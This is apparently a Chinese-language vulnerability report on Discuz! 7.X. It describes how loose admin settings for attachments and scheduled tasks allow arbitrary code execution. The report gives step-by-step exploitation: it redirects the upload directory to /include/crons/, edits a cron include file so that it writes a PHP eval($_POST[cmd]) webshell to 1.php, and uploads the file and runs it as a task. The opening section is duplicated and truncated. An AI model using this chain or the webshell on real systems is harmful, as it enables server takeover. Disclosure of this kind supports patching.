VULHUB ™

### 简要描述： Discuz!7.X后台设置不严格导致任意代码执行获得webshell ### 详细说明： [<img src="https://images.seebug.org/upload/201307/3121085798286f9239ecf6952b3643c2e158c9fa.png" alt="20130731210804.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/3121085798286f9239ecf6952b3643c2e158c9fa.png) 由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行 ### 漏洞证明： 首先到全局附件设置修改上传目录 [<img src="https://images.seebug.org/upload/201307/312115546d8415c9545f038e5161f0b781cfe590.png" alt="20130731211455.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/312115546d8415c9545f038e5161f0b781cfe590.png) 然后直接拿他本身存在的计划任务件 /include/crons/announcements_daily.inc.php修改内容为 ``` <?php /* [Discuz!] (C)2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $Id: announcements_daily.inc.php 17476 2008-12-25 02:58:18Z liuqiang $ */ if(!defined('IN_DISCUZ')) { exit('Access Denied'); } fputs(fopen('1.php','w'),'<?php...

### 简要描述： Discuz!7.X后台设置不严格导致任意代码执行获得webshell ### 详细说明： [<img src="https://images.seebug.org/upload/201307/3121085798286f9239ecf6952b3643c2e158c9fa.png" alt="20130731210804.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/3121085798286f9239ecf6952b3643c2e158c9fa.png) 由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行 ### 漏洞证明： 首先到全局附件设置修改上传目录 [<img src="https://images.seebug.org/upload/201307/312115546d8415c9545f038e5161f0b781cfe590.png" alt="20130731211455.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/312115546d8415c9545f038e5161f0b781cfe590.png) 然后直接拿他本身存在的计划任务件 /include/crons/announcements_daily.inc.php修改内容为 ``` <?php /* [Discuz!] (C)2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $Id: announcements_daily.inc.php 17476 2008-12-25 02:58:18Z liuqiang $ */ if(!defined('IN_DISCUZ')) { exit('Access Denied'); } fputs(fopen('1.php','w'),'<?php eval($_POST[cmd)?>\r\n'); ?> ``` 我是保存的11.txt,到论坛任意可以上传文件的板块发表新帖上传 [<img src="https://images.seebug.org/upload/201307/31212913f9828239705b5040603845e7f8a188d6.png" alt="20130731212812.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/31212913f9828239705b5040603845e7f8a188d6.png) 到后台在附件管理可以获得上传的路径和文件名 [<img src="https://images.seebug.org/upload/201307/31213528c2bb68021e0a12fdb30470a31bf90483.png" alt="20130731213457.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/31213528c2bb68021e0a12fdb30470a31bf90483.png) 我这里显示的是1307312134da261a93f37e3656.txt,记住这个文件名 把他写到计划任务里 [<img src="https://images.seebug.org/upload/201307/31214123845bc4a72fae558a952e74c05ef76888.png" alt="20130731213935.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/31214123845bc4a72fae558a952e74c05ef76888.png) 提交后点执行1.php就在根目录生成了